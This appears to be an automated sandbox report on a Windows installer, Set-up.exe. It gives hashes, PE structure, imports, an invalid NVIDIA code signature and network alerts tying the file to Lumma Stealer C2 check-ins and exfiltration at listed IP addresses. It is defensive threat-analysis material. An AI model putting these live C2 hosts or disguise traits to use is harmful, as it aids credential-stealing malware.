                                                                                                                                                                                                                                                            Entropy (8bit):0.4845359981692001
                                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 97.75%
                                                                                                                                                                                                                                                            • Windows ActiveX control (116523/4) 1.14%
                                                                                                                                                                                                                                                            • Inno Setup installer (109748/4) 1.07%
                                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                            File name:Set-up.exe
                                                                                                                                                                                                                                                            File size:74'868'247 bytes
                                                                                                                                                                                                                                                            MD5:956e50e278acbf39dfca43e8ba78f112
                                                                                                                                                                                                                                                            SHA1:50d818804b27bfa3ad79a469f0f93d08e3d09b9c
                                                                                                                                                                                                                                                            SHA256:caa52bf06d55953df9dba864dcc718170f4598e217e6f949c909d59b19d74a02
                                                                                                                                                                                                                                                            SHA512:5f0a561a9ca4581613e0c28c7c7205e3c4a4938f87dec07684136e9842ec5cfdcb994860d3ba953af0520366ad1bc7ac8903cd2a7a857f2d83447d6d94b24fa6
                                                                                                                                                                                                                                                            SSDEEP:24576:xnbbPImeK4brDi4IxgRqzwqNb+Yz73P2EMZbG0JEtdqxytSGs4UhtcjAuwSV:xHwKh4nqzF3PYdStowTugA
                                                                                                                                                                                                                                                            TLSH:5FF7E52DB75302F2FB533AB94D17D3DCA92FA110332014DB659E06CE9E129D85632F6A
                                                                                                                                                                                                                                                            File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                                                                                                                            Icon Hash:2d2e3797b32b2b99
                                                                                                                                                                                                                                                            Entrypoint:0x5025d8
                                                                                                                                                                                                                                                            Entrypoint Section:.itext
                                                                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                                                                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                            Time Stamp:0x5B226D52 [Thu Jun 14 13:27:46 2018 UTC]
                                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                                            Import Hash:f62b90e31eca404f228fcf7068b00f31
                                                                                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                                                                                            Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                                                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                                                                                            • 27/07/2015 20:00:00 26/07/2018 19:59:59
                                                                                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                                                                                            • CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
                                                                                                                                                                                                                                                            Version:3
                                                                                                                                                                                                                                                            Thumbprint MD5:F7219078FBE20BC1B98BF8A86BFC0396
                                                                                                                                                                                                                                                            Thumbprint SHA-1:30632EA310114105969D0BDA28FDCE267104754F
                                                                                                                                                                                                                                                            Thumbprint SHA-256:1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
                                                                                                                                                                                                                                                            Serial:14781BC862E8DC503A559346F5DCC518
                                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                                                                            add esp, FFFFFFF0h
                                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                                            push esi
                                                                                                                                                                                                                                                            push edi
                                                                                                                                                                                                                                                            mov eax, 00500930h
                                                                                                                                                                                                                                                            call 00007F59545E3D16h
                                                                                                                                                                                                                                                            push FFFFFFECh
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                            mov ebx, dword ptr [eax+00000170h]
                                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                                            call 00007F59545E4BC1h
                                                                                                                                                                                                                                                            and eax, FFFFFF7Fh
                                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                                            push FFFFFFECh
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                                            call 00007F59545E4E16h
                                                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                                            push 00502653h
                                                                                                                                                                                                                                                            push dword ptr fs:[eax]
                                                                                                                                                                                                                                                            mov dword ptr fs:[eax], esp
                                                                                                                                                                                                                                                            push 00000001h
                                                                                                                                                                                                                                                            call 00007F59545E4561h
                                                                                                                                                                                                                                                            call 00007F59546DB3FCh
                                                                                                                                                                                                                                                            mov eax, dword ptr [00500568h]
                                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                                            push 005005CCh
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                            call 00007F59546571EDh
                                                                                                                                                                                                                                                            call 00007F59546DB450h
                                                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                                                            pop edx
                                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                                            mov dword ptr fs:[eax], edx
                                                                                                                                                                                                                                                            jmp 00007F59546DD3CBh
                                                                                                                                                                                                                                                            jmp 00007F59545DF43Dh
                                                                                                                                                                                                                                                            call 00007F59546DB1CCh
                                                                                                                                                                                                                                                            mov eax, 00000001h
                                                                                                                                                                                                                                                            call 00007F59545DFEFEh
                                                                                                                                                                                                                                                            call 00007F59545DF881h
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                            mov edx, 005027E8h
                                                                                                                                                                                                                                                            call 00007F5954656CF8h
                                                                                                                                                                                                                                                            push 00000005h
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax+00000170h]
                                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                                            call 00007F59545E4DD7h
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                            mov edx, dword ptr [004DACA0h]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x10e000         0x3840        .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x114000         0x70000       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x4762c57        0x39c0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x113000         0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x10ea80         0x88c         .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xffdc8 | 0xffe00 | fd1e55adfdbdbab67ae463c2a2fa8ed0 | False | 0.4829724138983879 | data | 6.485045957248534 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x101000 | 0x17f4 | 0x1800 | 8e0d52126a75001416d71c23878be2c1 | False | 0.5244140625 | data | 6.003729381717893 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x103000 | 0x308c | 0x3200 | c2acc8e96fc244753abd1d87bb624bc0 | False | 0.425078125 | data | 4.3575606000501415 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x107000 | 0x6198 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x10e000 | 0x3840 | 0x3a00 | 0e1e8128f777a5ff18a144305a4fb39c | False | 0.3108836206896552 | data | 5.2048781278956655 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x112000 | 0x3c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x113000 | 0x18 | 0x200 | 9cf98ea6bb17a35d99fa770a2e9a8ff0 | False | 0.05078125 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q" | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x114000 | 0x70000 | 0x70000 | aa2b7a7d8003a5b34a511f36903a9fb1 | False | 0.5853162493024554 | data | 7.360269965698417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x114c44 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x114d78 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x114eac | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x114fe0 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x115114 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x115248 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x11537c | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x1154b0 | 0x4e8 | Device independent bitmap graphic, 48 x 48 x 4, image size 1152 | | | 0.2945859872611465
RT_BITMAP | 0x115998 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.521551724137931
RT_ICON | 0x115a80 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5675675675675675
RT_ICON | 0x115ba8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.4486994219653179
RT_ICON | 0x116110 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.4637096774193548
RT_ICON | 0x1163f8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.3935018050541516
RT_STRING | 0x116ca0 | 0xec | data | | | 0.6059322033898306
RT_STRING | 0x116d8c | 0x250 | data | | | 0.47466216216216217
RT_STRING | 0x116fdc | 0x28c | data | | | 0.4647239263803681
RT_STRING | 0x117268 | 0x3e4 | data | | | 0.4347389558232932
RT_STRING | 0x11764c | 0x9c | data | | | 0.717948717948718
RT_STRING | 0x1176e8 | 0xe8 | data | | | 0.6293103448275862
RT_STRING | 0x1177d0 | 0x468 | data | | | 0.3820921985815603
RT_STRING | 0x117c38 | 0x38c | data | | | 0.3898678414096916
RT_STRING | 0x117fc4 | 0x3dc | data | | | 0.39271255060728744
RT_STRING | 0x1183a0 | 0x360 | data | | | 0.37037037037037035
RT_STRING | 0x118700 | 0x40c | data | | | 0.3783783783783784
RT_STRING | 0x118b0c | 0x108 | data | | | 0.5113636363636364
RT_STRING | 0x118c14 | 0xcc | data | | | 0.6029411764705882
RT_STRING | 0x118ce0 | 0x234 | data | | | 0.5070921985815603
RT_STRING | 0x118f14 | 0x3c8 | data | | | 0.3181818181818182
RT_STRING | 0x1192dc | 0x32c | data | | | 0.43349753694581283
RT_STRING | 0x119608 | 0x2a0 | data | | | 0.41964285714285715
RT_RCDATA | 0x1198a8 | 0x82e8 | data | English | United States | 0.11261637622344235
RT_RCDATA | 0x121b90 | 0x10 | data | | | 1.5
RT_RCDATA | 0x121ba0 | 0x1800 | PE32+ executable (console) x86-64, for MS Windows | English | United States | 0.3924153645833333
RT_RCDATA | 0x1233a0 | 0x6bc | data | | | 0.6467517401392111
RT_RCDATA | 0x123a5c | 0x5b10 | PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows | English | United States | 0.3255404941660947
RT_RCDATA | 0x12956c | 0x125 | Delphi compiled form 'TMainForm' | | | 0.7508532423208191
RT_RCDATA | 0x129694 | 0x3a2 | Delphi compiled form 'TNewDiskForm' | | | 0.524731182795699
RT_RCDATA | 0x129a38 | 0x320 | Delphi compiled form 'TSelectFolderForm' | | | 0.53625
RT_RCDATA | 0x129d58 | 0x300 | Delphi compiled form 'TSelectLanguageForm' | | | 0.5703125
RT_RCDATA | 0x12a058 | 0x5d9 | Delphi compiled form 'TUninstallProgressForm' | | | 0.4562458249832999
RT_RCDATA | 0x12a634 | 0x461 | Delphi compiled form 'TUninstSharedFileForm' | | | 0.4335414808206958
RT_RCDATA | 0x12aa98 | 0x2092 | Delphi compiled form 'TWizardForm' | | | 0.2299112497001679
RT_GROUP_CURSOR | 0x12cb2c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x12cb40 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x12cb54 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x12cb68 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x12cb7c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x12cb90 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x12cba4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x12cbb8 | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x12cbf8 | 0x15c | data | English | United States | 0.5689655172413793
RT_MANIFEST | 0x12cd54 | 0x62c | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4240506329113924
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll | GetKeyboardType, LoadStringW, MessageBoxA, CharNextW
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
user32.dll | CreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
msimg32.dll | AlphaBlend
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
version.dll | VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
mpr.dll | WNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
kernel32.dll | lstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
advapi32.dll | SetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
comctl32.dll | InitCommonControls
kernel32.dll | Sleep
oleaut32.dll | GetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                                                                                                                                                            comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                                                                                                                                                                            shell32.dllShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
                                                                                                                                                                                                                                                            shell32.dllSHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
                                                                                                                                                                                                                                                            comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                                                                                                            ole32.dllCoDisconnectObject
                                                                                                                                                                                                                                                            advapi32.dllAdjustTokenPrivileges
                                                                                                                                                                                                                                                            oleaut32.dllSysFreeString
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-05T18:53:16.329003+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49748 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:16.883420+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49748 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:16.883420+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49748 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:17.374948+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49749 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:17.922014+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49749 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:17.922014+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49749 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:18.515960+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49750 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:20.066657+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49751 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:21.303531+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49752 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:23.459991+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49753 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:24.497114+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49755 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:25.062321+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49755 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:25.568733+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49756 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:26.151646+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49756 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:26.900823+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49757 | 185.161.251.21 | 443 | TCP
2025-01-05T18:53:27.654581+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49758 | 172.67.208.58 | 443 | TCP
2025-01-05T18:53:28.054025+0100 | 2008438 | ET MALWARE Possible Windows executable sent when remote host claims to send a Text File | 1 | 172.67.208.58 | 443 | 192.168.2.4 | 49758 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:18.520286083 CET49750443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:18.520467997 CET49750443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:18.520500898 CET44349750104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:18.520575047 CET49750443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:18.520582914 CET44349750104.21.87.8192.168.2.4
